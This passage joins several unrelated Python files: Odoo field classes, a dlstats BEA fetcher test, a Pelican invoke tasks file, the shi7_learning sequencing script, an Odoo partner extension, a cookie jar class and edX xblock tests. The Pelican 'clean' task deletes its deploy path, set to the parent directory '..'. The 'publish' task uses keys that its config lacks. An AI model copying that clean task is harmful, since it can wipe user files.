    _column_auto_join = property(attrgetter('auto_join'))
    _column_limit = property(attrgetter('limit'))


class Many2many(_RelationalMulti):
    """ Many2many field; the value of such a field is the recordset.

        :param comodel_name: name of the target model (string)

        The attribute ``comodel_name`` is mandatory except in the case of related
        fields or field extensions.

        :param relation: optional name of the table that stores the relation in
            the database (string)

        :param column1: optional name of the column referring to "these" records
            in the table ``relation`` (string)

        :param column2: optional name of the column referring to "those" records
            in the table ``relation`` (string)

        The attributes ``relation``, ``column1`` and ``column2`` are optional. If not
        given, names are automatically generated from model names, provided
        ``model_name`` and ``comodel_name`` are different!

        :param domain: an optional domain to set on candidate values on the
            client side (domain or string)

        :param context: an optional context to use on the client side when
            handling that field (dictionary)

        :param limit: optional limit to use upon read (integer)

    """
    type = 'many2many'
    _slots = {
        'relation': None,               # name of table
        'column1': None,                # column of table referring to model
        'column2': None,                # column of table referring to comodel
        'limit': None,                  # optional limit to use upon read
    }

    def __init__(self, comodel_name=None, relation=None, column1=None, column2=None,
                 string=None, **kwargs):
        super(Many2many, self).__init__(
            comodel_name=comodel_name,
            relation=relation,
            column1=column1,
            column2=column2,
            string=string,
            **kwargs
        )

    def _setup_regular(self, env):
        super(Many2many, self)._setup_regular(env)

        if not self.relation and self.store:
            # retrieve self.relation from the corresponding column
            column = self.to_column()
            if isinstance(column, fields.many2many):
                self.relation, self.column1, self.column2 = \
                    column._sql_names(env[self.model_name])

        if self.relation:
            m2m = env.registry._m2m
            # if inverse field has already been setup, it is present in m2m
            invf = m2m.get((self.relation, self.column2, self.column1))
            if invf:
                self.inverse_fields += (invf,)
                invf.inverse_fields += (self,)
            else:
                # add self in m2m, so that its inverse field can find it
                m2m[(self.relation, self.column1, self.column2)] = self

    _column_rel = property(attrgetter('relation'))
    _column_id1 = property(attrgetter('column1'))
    _column_id2 = property(attrgetter('column2'))
    _column_limit = property(attrgetter('limit'))


class Serialized(Field):
    """ Minimal support for existing sparse and serialized fields. """
    type = 'serialized'

    def convert_to_cache(self, value, record, validate=True):
        return value or {}


class Id(Field):
    """ Special case for field 'id'. """
    type = 'integer'
    _slots = {
        'string': 'ID',
        'store': True,
        'readonly': True,
    }

    def to_column(self):
        self.column = fields.integer(self.string)
        return self.column

    def __get__(self, record, owner):
        if record is None:
            return self         # the field is accessed through the class owner
        if not record:
            return False
        return record.ensure_one()._ids[0]

    def __set__(self, record, value):
        raise TypeError("field 'id' cannot be assigned")

# imported here to avoid dependency cycle issues
from openerp import SUPERUSER_ID, registry
from .exceptions import Warning, AccessError, MissingError
from .models import BaseModel, MAGIC_COLUMNS
from .osv import fields

# -*- coding: utf-8 -*-

import io
import os

from dlstats.fetchers.bea import BEA as Fetcher

import httpretty

from dlstats.tests.base import RESOURCES_DIR as BASE_RESOURCES_DIR
from dlstats.tests.fetchers.base import BaseFetcherTestCase

import unittest
from unittest import mock

RESOURCES_DIR = os.path.abspath(os.path.join(BASE_RESOURCES_DIR, "bea"))

DATA_BEA_10101_An = {
    "filepath": os.path.abspath(os.path.join(RESOURCES_DIR, "nipa-section1.xls.zip")),
    "DSD": {
        "provider": "BEA",
        "filepath": None,
        "dataset_code": "nipa-section1-10101-a",
        "dsd_id": "nipa-section1-10101-a",
        "is_completed": True,
        "categories_key": "nipa-section1",
        "categories_parents": ["national", "nipa"],
        "categories_root": ["national", "nipa", "nipa-fa2004", "nipa-underlying"],
        "concept_keys": ['concept', 'frequency'],
        "codelist_keys": ['concept', 'frequency'],
        "codelist_count": {
            "concept": 25,
            "frequency": 1
        },        
        "dimension_keys": ['concept', 'frequency'],
        "dimension_count": {
            "concept": 25,
            "frequency": 1
        },
        "attribute_keys": [],
        "attribute_count": None,
    },
    "series_accept": 25,
    "series_reject_frequency": 0,
    "series_reject_empty": 0,
    "series_all_values": 1175,
    "series_key_first": "A191RL1-A",
    "series_key_last": "A191RP1-A",
    "series_sample": {
        'provider_name': 'BEA',
        'dataset_code': 'nipa-section1-10101-a',
        'key': 'A191RL1-A',
        'name': 'Gross domestic product - Annually',
        'frequency': 'A',
        'last_update': None,
        'first_value': {
            'value': '3.1',
            'period': '1969',
            'attributes': None,
        },
        'last_value': {
            'value': '2.4',
            'period': '2015',
            'attributes': None,
        },
        'dimensions': {
            'concept': 'a191rl1',
            "frequency": 'a'
        },
        'attributes': None,
    }
}

def _get_datasets_settings(self):
    return { 
        "nipa-section1-10101-a": {
            'dataset_code': 'nipa-section1-10101-a',
            'name': 'Table 1.1.1. Percent Change From Preceding Period in Real Gross Domestic Product - Annually',
            'last_update': None,
            'metadata': {
                'filename': 'nipa-section1.xls.zip',
                'sheet_name': '10101 Ann',
                'url': 'http://www.bea.gov/national/nipaweb/GetCSV.asp?GetWhat=SS_Data/Section1All_xls.zip&Section=2'
            },
        }
    }

class FetcherTestCase(BaseFetcherTestCase):

    # nosetests -s -v dlstats.tests.fetchers.test_bea:FetcherTestCase
    
    FETCHER_KLASS = Fetcher
    
    DATASETS = {
        'nipa-section1-10101-a': DATA_BEA_10101_An
    }
    
    DATASET_FIRST = "nipa-fa2004-section1-101-a"
    DATASET_LAST = "nipa-underlying-section9-90500U-a"
    DEBUG_MODE = False

    def _load_files(self, dataset_code):
        url = "http://www.bea.gov/national/nipaweb/GetCSV.asp?GetWhat=SS_Data/Section1All_xls.zip&Section=2"
        self.register_url(url, 
                          self.DATASETS[dataset_code]["filepath"])

    @httpretty.activate
    @unittest.skipUnless('FULL_TEST' in os.environ, "Skip - no full test")
    def test_load_datasets_first(self):

        dataset_code = "nipa-section1-10101-a"
        self._load_files(dataset_code)
        self.assertLoadDatasetsFirst([dataset_code])

    @httpretty.activate     
    @unittest.skipUnless('FULL_TEST' in os.environ, "Skip - no full test")
    def test_load_datasets_update(self):

        dataset_code = "nipa-section1-10101-a"
        self._load_files(dataset_code)
        self.assertLoadDatasetsUpdate([dataset_code])

    #@httpretty.activate
    @unittest.skipIf(True, "TODO")     
    def test_build_data_tree(self):

        dataset_code = "nipa-section1-10101-a"
        self.assertDataTree(dataset_code)
            
    @httpretty.activate
    @mock.patch("dlstats.fetchers.bea.BEA._get_datasets_settings", _get_datasets_settings)     
    def test_upsert_dataset_10101(self):

        # nosetests -s -v dlstats.tests.fetchers.test_bea:FetcherTestCase.test_upsert_dataset_10101
    
        dataset_code = "nipa-section1-10101-a"
        
        self._load_files(dataset_code)
    
        self.assertProvider()
        dataset = self.assertDataset(dataset_code)

        names = {
         'a191rl1': 'Gross domestic product',
         'dpcerl1': 'Personal consumption expenditures',
         'dgdsrl1': 'Personal consumption expenditures - Goods',
         'ddurrl1': 'Personal consumption expenditures - Goods - Durable goods',
         'dndgrl1': 'Personal consumption expenditures - Goods - Nondurable goods',
         'dserrl1': 'Personal consumption expenditures - Services',        
         'a006rl1': 'Gross private domestic investment',
         'a007rl1': 'Gross private domestic investment - Fixed investment',
         'a008rl1': 'Gross private domestic investment - Fixed investment - Nonresidential',
         'y033rl1': 'Gross private domestic investment - Fixed investment - Nonresidential - Equipment',
         'a011rl1': 'Gross private domestic investment - Fixed investment - Residential',
         'a020rl1': 'Net exports of goods and services - Exports',
         'a191rp1': 'Addendum: - Gross domestic product, current dollars'
        }

        for k, v in names.items():
            self.assertTrue(k in dataset["codelists"]["concept"])
            self.assertEquals(dataset["codelists"]["concept"][k], v)
        
        series_list = self.assertSeries(dataset_code)
        series_keys = {s["key"].lower(): s for s in series_list}

        for k, v in names.items():
            search_k = "%s-a" % k
            search_name = "%s - Annually" % v 
            self.assertTrue(search_k in series_keys, "%s not in series_keys" % search_k)
            self.assertEquals(series_keys[search_k]["name"], search_name)
        
        for series in series_list:
            self.assertEquals(series["last_update_ds"], dataset["last_update"])


# -*- coding: utf-8 -*-

import os
import shutil
import sys
import datetime

from invoke import task
from invoke.util import cd
from pelican.server import ComplexHTTPRequestHandler, RootedHTTPServer

CONFIG = {
    # Local path configuration (can be absolute or relative to tasks.py)
    'deploy_path': '..',
    # Github Pages configuration
    'github_pages_branch': 'gh-pages',
    'commit_message': "'Publish site on {}'".format(datetime.date.today().isoformat()),
    # Port for `serve`
    'port': 8000,
}

@task
def clean(c):
    """Remove generated files"""
    if os.path.isdir(CONFIG['deploy_path']):
        shutil.rmtree(CONFIG['deploy_path'])
        os.makedirs(CONFIG['deploy_path'])

@task
def build(c):
    """Build local version of site"""
    c.run('pelican -s pelicanconf.py')

@task
def rebuild(c):
    """`build` with the delete switch"""
    c.run('pelican -d -s pelicanconf.py')

@task
def regenerate(c):
    """Automatically regenerate site upon file modification"""
    c.run('pelican -r -s pelicanconf.py')

@task
def serve(c):
    """Serve site at http://localhost:8000/"""

    class AddressReuseTCPServer(RootedHTTPServer):
        allow_reuse_address = True

    server = AddressReuseTCPServer(
        CONFIG['deploy_path'],
        ('', CONFIG['port']),
        ComplexHTTPRequestHandler)

    sys.stderr.write('Serving on port {port} ...\n'.format(**CONFIG))
    server.serve_forever()

@task
def reserve(c):
    """`build`, then `serve`"""
    build(c)
    serve(c)

@task
def preview(c):
    """Build production version of site"""
    c.run('pelican -s publishconf.py')


@task
def publish(c):
    """Publish to production via rsync"""
    c.run('pelican -s publishconf.py')
    c.run(
        'rsync --delete --exclude ".DS_Store" -pthrvz -c '
        '{} {production}:{dest_path}'.format(
            CONFIG['deploy_path'].rstrip('/') + '/',
            **CONFIG))

@task
def gh_pages(c):
    """Publish to GitHub Pages"""
    preview(c)
    c.run('ghp-import -b {github_pages_branch} '
          '-m {commit_message} '
          '{deploy_path} -p'.format(**CONFIG))

#!/usr/bin/env python
from __future__ import print_function, division
import multiprocessing
import os
import csv
import datetime
import logging
from datetime import datetime
import argparse
import shutil
import math
from glob import glob
import gzip
from shi7 import __version__

from shi7.shi7 import TRUE_FALSE_DICT, read_fastq, axe_adaptors_single_end, axe_adaptors_paired_end, flash_part1, \
    flash_part2, split_fwd_rev, match_pairs, link_manicured_names

def make_arg_parser():
    parser = argparse.ArgumentParser(description='This is the commandline interface for shi7_learning',
                                     usage='shi7_learning v{version}\nshi7_learning.py -i <input> -o <output> ...'.format(version=__version__))
    parser.add_argument('-i', '--input', help='Set the directory path of the fastq directory OR oligos.txt if splitting', required=True)
    parser.add_argument('-o', '--output', help='Set the directory path of the output (default: cwd)', default=os.getcwd())
    parser.add_argument('--debug', help='Retain all intermediate files (default: Disabled)', dest='debug', action='store_true')
    parser.add_argument('-t', '--threads', help='Set the number of threads (default: %(default)s)',
                        default=min(multiprocessing.cpu_count(), 16))
    parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + __version__)
    parser.set_defaults()
    return parser


def subsample_fastqs(path_fastqs, num_files=10, num_sequences=1000):
    for i, path_fastq in enumerate(path_fastqs):
        if i >= num_files:
            return
        with open(path_fastq) as fastq_inf:
            fastq_gen = read_fastq(fastq_inf)
            yield limit_fastq(fastq_gen, num_sequences=num_sequences)


def limit_fastq(fastq_gen, num_sequences=1000):
    for i in range(num_sequences):
        try:
            yield next(fastq_gen)
        except StopIteration:
            return


def get_seq_length_qual_scores(path_fastqs, output_path, num_files=10, num_sequences=1000):
    subsampled_fastqs = subsample_fastqs(path_fastqs, num_files=num_files, num_sequences=num_sequences)
    sequence_len_sum = 0.
    quality_sum = 0
    num_sequences = 0.

    for fastq_path, fastq_gen in zip(path_fastqs, subsampled_fastqs):
        with open(os.path.join(output_path, os.path.basename(fastq_path)), 'w') as outf:
            for header, sequence, quality in fastq_gen:
                outf.write("@%s\n%s\n+\n%s\n" % (header, sequence, quality))
                sequence_len_sum += len(sequence)
                quality_sum += sum([ord(i) for i in quality])
                num_sequences += 1.
    # Return (average length of sequences, average quality score)
    return sequence_len_sum/num_sequences, quality_sum/sequence_len_sum


def count_num_lines(path):
    with open(path) as path_inf:
        return sum(1 for line in path_inf)


def get_file_size(path):
    return os.path.getsize(path)


def check_sequence_name(path_R1, path_R2):
    with open(path_R1) as path_inf_R1, open(path_R2) as path_inf_R2:
        fastq_gen_R1 = read_fastq(path_inf_R1)
        fastq_gen_R2 = read_fastq(path_inf_R2)
        for gen_R1, gen_R2 in zip(fastq_gen_R1,fastq_gen_R2):
            title_R1, title_R2 = gen_R1[0], gen_R2[0]
            if len(title_R1) != len(title_R2):
                return False
            diff_idx = [i for i in range(len(title_R1)) if title_R1[i] != title_R2[i]]
            if len(diff_idx) != 1:
                return False
            if int(title_R2[diff_idx[0]]) - int(title_R1[diff_idx[0]]) != 1:
                return False
    return True


def detect_paired_end(path_fastqs):
    path_fastqs = [f for f in path_fastqs if f.endswith('.fastq') or f.endswith('.fq') or f.endswith('.fastq.gz') or f.endswith('.fq.gz')]
    if len(path_fastqs) % 2 == 1: return False, [path_fastqs, None, None, None]
    pair_obj = match_pairs(path_fastqs, True)
    path_fastqs = pair_obj[0]
    if pair_obj[1]==None: return False, pair_obj
    return True, pair_obj

def get_directory_size(path):
    return sum([get_file_size(os.path.join(path, fastq)) for fastq in os.listdir(path)])

def remove_directory_contents(path):
    for f in os.listdir(path):
        os.remove(os.path.join(path, f))

def choose_axe_adaptors(path_subsampled_fastqs, paired_end, output_path, threads):
    adapters = ['TruSeq2', 'TruSeq3', 'TruSeq3-2', 'Nextera']
    threads = min(threads, multiprocessing.cpu_count(), 16)
    original_size = get_directory_size(os.path.dirname(path_subsampled_fastqs[0]))
    logging.info('Original size of the subsampled_fastqs = ' + str(original_size))
    best_size = original_size
    best_adap = None
    for adapter in adapters:
        if paired_end:
            axe_adaptors_paired_end(path_subsampled_fastqs, output_path, adapter, threads, shell=False)
        else:
            axe_adaptors_single_end(path_subsampled_fastqs, output_path, adapter, threads, shell=False)
        fastqs_path_size = get_directory_size(output_path)
        logging.info("Adapters: {adapter}\tFile Size: {filesize}".format(adapter=adapter, filesize=fastqs_path_size))
        if fastqs_path_size <= best_size:
            best_size = fastqs_path_size
            best_adap = adapter

    if best_size < 0.995*original_size:
        # Actually write the best files again for use in later steps
        logging.info("Best Adapters: {adapter}\tFile Size: {filesize}".format(adapter=best_adap, filesize=best_size))

        if paired_end:
            files = axe_adaptors_paired_end(path_subsampled_fastqs, output_path, best_adap, threads, shell=False)
        else:
            files = axe_adaptors_single_end(path_subsampled_fastqs, output_path, best_adap, threads, shell=False)
        return best_adap, best_size, files
    else:
        return None, original_size, path_subsampled_fastqs


def flash_stitchable_and_check_outies(adapter_output_filenames, flash_output_path, threads):
    flash_output_str = flash_part1(adapter_output_filenames, flash_output_path, max_overlap=700, \
        min_overlap=10, allow_outies=True, threads=threads, shell=False)

    allow_outies_count = 0
    for flash_out in flash_output_str:
        flash_str_list = flash_out.strip().split('\n')
        outies_info = flash_str_list[-8]
        outies_percent = float(outies_info[outies_info.find('(')+1:outies_info.find('%')])
        if outies_percent >= 15:
            allow_outies_count += 1

    path_flash_fqs = flash_part2(flash_output_str, flash_output_path)
    path_R1_fastqs, _ = split_fwd_rev(adapter_output_filenames)

    matched_count = 0
    for original_fq, flash_fq in zip(path_R1_fastqs, path_flash_fqs):
        if count_num_lines(flash_fq) > count_num_lines(original_fq)*0.3:
            matched_count = matched_count + 1

    return matched_count/len(path_flash_fqs) >= 0.75, allow_outies_count/len(flash_output_str) >= 0.75, path_flash_fqs


def flash_check_cv(flash_output_path):
    hist_files = [os.path.join(flash_output_path, f) for f in os.listdir(flash_output_path) if f.endswith('.hist')]
    total_cv = total_mean = 0
    for f in hist_files:
        with open(f) as inf:
            csv_inf = csv.reader(inf, delimiter="\t")
            x2f = 0
            sum = 0
            cnt = 0
            for row in csv_inf:
                row = [int(r) for r in row]
                cnt = cnt + row[1]
                sum = sum + row[0] * row[1]
                x2f = x2f + row[0] * row[0] * row[1]
            mean = sum/cnt
            std = math.sqrt((x2f - sum*sum/cnt)/(cnt-1))
            cv = std/mean
            total_cv = total_cv + cv
            total_mean = total_mean + mean
    total_files = len(hist_files)
    return total_cv/total_files, total_mean/total_files


def trimmer_learning(flash_output_filenames):
    filter_q_sum = 0
    trim_q_sum = 0
    totbases = 0
    tottrim = 0
    num = 0
    for fq_path in flash_output_filenames:
        with open(fq_path) as fq_inf:
            fq_gen = read_fastq(fq_inf)
            for gen in fq_gen:
                num = num + 1
                qualities = gen[2]
                totbases = totbases + len(qualities)
                qualities = [ord(qual)-33 for qual in qualities]
                filter_q_sum = filter_q_sum + sum(qualities)
                if (len(qualities) >= 20):
                    trim_q_sum = trim_q_sum + sum(qualities[:10]) + sum(qualities[-10:])
                    tottrim = tottrim + 20
    logging.info('num seqs: %d' % num)
    logging.info('filter_q_sum: %d' % filter_q_sum)
    logging.info('trim_q_sum: %d' % trim_q_sum)
    logging.info('total bases considered: %d (trim: %d)' % (totbases, tottrim))
    logging.info('filter_q: %d' % (filter_q_sum/totbases))
    logging.info('trim_q: %d' % (trim_q_sum/tottrim))

    filter_q = math.floor(filter_q_sum/totbases)
    trim_q = math.floor(trim_q_sum/tottrim)-1
    trim_q = trim_q if trim_q > filter_q - 3 else filter_q - 3

    return filter_q, trim_q

def template_input(input):
    input = os.path.abspath(input)
    # input, input_cmd
    return "input\t{}".format(input), ["--input", input]

def template_paired_end(bool):
    # bool, paired_end
    if bool:
        return "paired_end\t{}".format(str(bool)), None
    else:
        return "paired_end\t{}".format(str(bool)), ["-SE"]

def template_trim(filt_q, trim_q):
    return "filt_q: %d, trim_q: %d" % (filt_q, trim_q), ["--filter_qual", str(filt_q), "--trim_qual", str(trim_q)]

def template_cv(minstitch, maxstitch):
    return "minstitch: %d, maxstitch: %d" % (minstitch, maxstitch), ["--min_overlap", str(minstitch), "--max_overlap", str(maxstitch)]

def template_output(output):
    # output, output_cmd
    output = os.path.abspath(output)
    return "output\t{}".format(output), ["--output", output]

def template_choose_axe_adaptors(best_adapt, best_size):
   if best_adapt:
       return "axe_adaptors\t" + best_adapt, ["--adaptor", best_adapt]
   else:
       return "axe_adaptors\tNA", ["--adaptor", "None"]

def template_flash(stitches, do_outies):
    return "stitches: %s, outies: %s" % (stitches, do_outies), ["--flash", str(stitches), "--allow_outies", str(do_outies)]

def main():
    start_time = datetime.now()

    parser = make_arg_parser()
    args = parser.parse_args()

    learning_params = ["shi7.py"]
    learning_pretty = ["SHI7 version", __version__]

    input = os.path.abspath(args.input)
    output = os.path.abspath(args.output)

    # Make output folder
    if not os.path.exists(output):
        os.makedirs(output)

    # Put in the logging file
    logging.basicConfig(filename=os.path.join(output, 'shi7_learning.log'), filemode='w', level=logging.DEBUG, \
        format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')

    # Make temp outfolder
    if os.path.exists(os.path.join(args.output, 'temp')):
        shutil.rmtree(os.path.join(args.output, 'temp'))
        logging.info('Existing temp directory deleted.')
        os.makedirs(os.path.join(args.output, 'temp'))
    else:
        os.makedirs(os.path.join(args.output, 'temp'))


    path_fastqs = [os.path.join(input, f) for f in os.listdir(input) if f.endswith('fastq') or f.endswith('fq') or f.endswith('fq.gz') or f.endswith('fastq.gz')]

    if len(path_fastqs) == 0:
        msg = "No FASTQS found in input folder {}".format(input)
        logging.critical(msg)
        raise IOError(msg)

    # Record the input
    results, addon = template_input(input)
    logging.info(results)
    if addon:
        learning_params.extend(addon)

    # Write temp subsampled fastqs
    subsampled_fastq_path = os.path.join(output, 'temp', 'subsampled')
    os.makedirs(subsampled_fastq_path)
    totbases = totseqs = 0
    for file in path_fastqs:
        basename = os.path.basename(file)
        if(file.endswith('.fastq') or file.endswith('.fq')):
            fastq_inf = open(file)
        else:
            fastq_inf = gzip.open(file, 'rt')
        fastq_gen = read_fastq(fastq_inf)
        if(basename.endswith('.gz')):
            basename = basename[:-3]
        with open(os.path.join(subsampled_fastq_path, basename), 'w') as outf:
            for header, seq, quality in limit_fastq(fastq_gen):
                outf.write("@{header}\n{seq}\n+\n{quality}\n".format(header=header, seq=seq, quality=quality))
                totbases += len(seq)
                totseqs += 1
    avlen = totbases/totseqs
    path_fastqs = glob(os.path.join(subsampled_fastq_path , "*"))



    # Detect if paired end
    paired_end, pair_obj = detect_paired_end(path_fastqs)
    path_fastqs = pair_obj[0]
    link_outdir = os.path.join(output, 'temp', 'link')
    os.makedirs(link_outdir)
    snames = [os.path.basename(n) for n in path_fastqs]
    path_fastqs = link_manicured_names(path_fastqs, snames, link_outdir, not paired_end, pair_obj[1:])

    results, addon = template_paired_end(paired_end)
    logging.info(results)
    if addon: learning_params.extend(addon)
    learning_pretty += ["Paired end",paired_end]

    # Detect adapters
    axe_adaptors_path = os.path.join(output, 'temp', 'axe_adaptors')
    os.makedirs(axe_adaptors_path)
    best_adap, best_size, fastq_paths = choose_axe_adaptors(path_fastqs, paired_end, axe_adaptors_path, int(args.threads))
    results, addon = template_choose_axe_adaptors(best_adap, best_size)
    logging.info(results)
    if addon: learning_params.extend(addon)
    learning_pretty += ["Detected adaptors",best_adap]

    # Detect output folder
    results, addon = template_output(output)
    logging.info(results)
    if addon: learning_params.extend(addon)

    # Detect stitching
    stitched_path = os.path.join(output, 'temp', 'flash')
    os.makedirs(stitched_path)
    if paired_end:
        stitches, do_outies, fastq_paths = flash_stitchable_and_check_outies(fastq_paths, stitched_path, int(args.threads))
    else: stitches, do_outies = False, False
    results, addon = template_flash(stitches, do_outies)
    logging.info(results)
    if addon: learning_params.extend(addon)
    if paired_end:
        learning_pretty += ["Stitching",stitches]
        if stitches: learning_pretty += ["Outies allowed",do_outies]

    filt_q, trim_q = trimmer_learning(fastq_paths)
    results, addon = template_trim(int(filt_q), int(trim_q))
    logging.info(results)
    if addon: learning_params.extend(addon)
    learning_pretty += ["Filter quality",filt_q,"Trimming quality",trim_q]

    # Check whether to implement stitching bounds
    if stitches:
        cv, mean = flash_check_cv(stitched_path)
        if cv < 0.1:
            learning_pretty += ["Amplicon mode",True]
            logging.info("CV: %f, Mean: %f, Avlen: %f" % (cv, mean, avlen))
            if avlen > mean: avlen = mean
            mr = math.ceil(cv*mean)
            logging.info("SD was: %d" % mr)
            minstitch, maxstitch = int(2*avlen - mean-mr), int(2*avlen - mean+mr)
            if minstitch < 8: minstitch = 8
            logging.info("Amplicon mode: stitch range [%d, %d]" % (minstitch, maxstitch))
            results, addon = template_cv(minstitch, maxstitch)
            logging.info(results)
            if addon: learning_params.extend(addon)
            learning_pretty += ["Amplicon stitch minimum",minstitch]
            learning_pretty += ["Amplicon stitch maximum",maxstitch]
        else: learning_pretty += ["Amplicon mode",False]

    #print(str(learning_params))
    with open(os.path.join(args.output, "shi7_cmd.sh"), "w") as output:
        cmd = " ".join(learning_params)
        output.write(cmd)
        print(cmd)

    with open(os.path.join(args.output, "learning_params.txt"),"w") as output:
        for ix in range(0,len(learning_pretty),2):
            output.write(str(learning_pretty[ix]) + "\t" + str(learning_pretty[ix+1]) + "\n")

    if not args.debug:
        shutil.rmtree(os.path.join(args.output, 'temp'))
    logging.info('Execution time: %s' % (datetime.now() - start_time))

if __name__ == "__main__":
    main()

# -*- coding: utf-8 -*-
##############################################################################
#
# Author: OpenDrive Ltda
# Copyright (c) 2013 Opendrive Ltda
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsibility of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# guarantees and support are strongly advised to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
#
##############################################################################

from openerp.osv import osv, fields
from openerp.tools.translate import _


class Partner(osv.osv):
	_inherit = 'res.partner'
	
	_columns = {
	'legal_representative': fields.char(
	    'Legal Representative',
	),
	}


	
# -*- coding: utf-8 -*-

import time
from datetime import timedelta


class CookieJar:
    def __init__(self, pluginname, account=None):
        self.cookies = {}
        self.plugin = pluginname
        self.account = account

    def add_cookies(self, clist):
        for c in clist:
            name = c.split("\t")[5]
            self.cookies[name] = c

    def get_cookies(self):
        return list(self.cookies.values())

    def parse_cookie(self, name):
        if name in self.cookies:
            return self.cookies[name].split("\t")[6]
        else:
            return None

    def get_cookie(self, name):
        return self.parse_cookie(name)

    def set_cookie(
        self,
        domain,
        name,
        value,
        path="/",
        exp=time.time() + timedelta(hours=744).total_seconds(),  #: 31 days retention
    ):
        self.cookies[
            name
        ] = f".{domain}\tTRUE\t{path}\tFALSE\t{exp}\t{name}\t{value}"

    def clear(self):
        self.cookies = {}

"""
Test scenarios for the review xblock.
"""
import ddt
import unittest

from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from nose.plugins.attrib import attr

from lms.djangoapps.courseware.tests.factories import GlobalStaffFactory
from lms.djangoapps.courseware.tests.helpers import LoginEnrollmentTestCase
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory

from review import get_review_ids
import crum


class TestReviewXBlock(SharedModuleStoreTestCase, LoginEnrollmentTestCase):
    """
    Create the test environment with the review xblock.
    """
    STUDENTS = [
        {'email': 'learner@test.com', 'password': 'foo'},
    ]
    XBLOCK_NAMES = ['review']
    URL_BEGINNING = settings.LMS_ROOT_URL + \
        '/xblock/block-v1:DillonX/DAD101x_review/3T2017+type@'

    @classmethod
    def setUpClass(cls):
        # Nose runs setUpClass methods even if a class decorator says to skip
        # the class: https://github.com/nose-devs/nose/issues/946
        # So, skip the test class here if we are not in the LMS.
        if settings.ROOT_URLCONF != 'lms.urls':
            raise unittest.SkipTest('Test only valid in lms')

        super(TestReviewXBlock, cls).setUpClass()

        # Set up for the actual course
        cls.course_actual = CourseFactory.create(
            display_name='Review_Test_Course_ACTUAL',
            org='DillonX',
            number='DAD101x',
            run='3T2017'
        )
        # There are multiple sections so the learner can load different
        # problems, but should only be shown review problems from what they have loaded
        with cls.store.bulk_operations(cls.course_actual.id, emit_signals=False):
            cls.chapter_actual = ItemFactory.create(
                parent=cls.course_actual, display_name='Overview'
            )
            cls.section1_actual = ItemFactory.create(
                parent=cls.chapter_actual, display_name='Section 1'
            )
            cls.unit1_actual = ItemFactory.create(
                parent=cls.section1_actual, display_name='New Unit 1'
            )
            cls.xblock1_actual = ItemFactory.create(
                parent=cls.unit1_actual,
                category='problem',
                display_name='Problem 1'
            )
            cls.xblock2_actual = ItemFactory.create(
                parent=cls.unit1_actual,
                category='problem',
                display_name='Problem 2'
            )
            cls.xblock3_actual = ItemFactory.create(
                parent=cls.unit1_actual,
                category='problem',
                display_name='Problem 3'
            )
            cls.xblock4_actual = ItemFactory.create(
                parent=cls.unit1_actual,
                category='problem',
                display_name='Problem 4'
            )
            cls.section2_actual = ItemFactory.create(
                parent=cls.chapter_actual, display_name='Section 2'
            )
            cls.unit2_actual = ItemFactory.create(
                parent=cls.section2_actual, display_name='New Unit 2'
            )
            cls.xblock5_actual = ItemFactory.create(
                parent=cls.unit2_actual,
                category='problem',
                display_name='Problem 5'
            )
            cls.section3_actual = ItemFactory.create(
                parent=cls.chapter_actual, display_name='Section 3'
            )
            cls.unit3_actual = ItemFactory.create(
                parent=cls.section3_actual, display_name='New Unit 3'
            )
            cls.xblock6_actual = ItemFactory.create(
                parent=cls.unit3_actual,
                category='problem',
                display_name='Problem 6'
            )

        cls.course_actual_url = reverse(
            'courseware_section',
            kwargs={
                'course_id': unicode(cls.course_actual.id),
                'chapter': 'Overview',
                'section': 'Welcome',
            }
        )

        # Set up for the review course where the review problems are hosted
        cls.course_review = CourseFactory.create(
            display_name='Review_Test_Course_REVIEW',
            org='DillonX',
            number='DAD101x_review',
            run='3T2017'
        )
        with cls.store.bulk_operations(cls.course_review.id, emit_signals=True):
            cls.chapter_review = ItemFactory.create(
                parent=cls.course_review, display_name='Overview'
            )
            cls.section_review = ItemFactory.create(
                parent=cls.chapter_review, display_name='Welcome'
            )
            cls.unit1_review = ItemFactory.create(
                parent=cls.section_review, display_name='New Unit 1'
            )
            cls.xblock1_review = ItemFactory.create(
                parent=cls.unit1_review,
                category='problem',
                display_name='Problem 1'
            )
            cls.xblock2_review = ItemFactory.create(
                parent=cls.unit1_review,
                category='problem',
                display_name='Problem 2'
            )
            cls.xblock3_review = ItemFactory.create(
                parent=cls.unit1_review,
                category='problem',
                display_name='Problem 3'
            )
            cls.xblock4_review = ItemFactory.create(
                parent=cls.unit1_review,
                category='problem',
                display_name='Problem 4'
            )
            cls.unit2_review = ItemFactory.create(
                parent=cls.section_review, display_name='New Unit 2'
            )
            cls.xblock5_review = ItemFactory.create(
                parent=cls.unit2_review,
                category='problem',
                display_name='Problem 5'
            )
            cls.unit3_review = ItemFactory.create(
                parent=cls.section_review, display_name='New Unit 3'
            )
            cls.xblock6_review = ItemFactory.create(
                parent=cls.unit3_review,
                category='problem',
                display_name='Problem 6'
            )

        cls.course_review_url = reverse(
            'courseware_section',
            kwargs={
                'course_id': unicode(cls.course_review.id),
                'chapter': 'Overview',
                'section': 'Welcome',
            }
        )

    def setUp(self):
        super(TestReviewXBlock, self).setUp()

        for idx, student in enumerate(self.STUDENTS):
            username = 'u{}'.format(idx)
            self.create_account(username, student['email'], student['password'])
            self.activate_user(student['email'])

        self.staff_user = GlobalStaffFactory()

    def enroll_student(self, email, password, course):
        """
        Student login and enroll for the course
        """
        self.login(email, password)
        self.enroll(course, verify=True)


@attr(shard=1)
@ddt.ddt
class TestReviewFunctions(TestReviewXBlock):
    """
    Check that the essential functions of the Review xBlock work as expected.
    Tests cover the basic process of receiving a hint, adding a new hint,
    and rating/reporting hints.
    """
    def test_no_review_problems(self):
        """
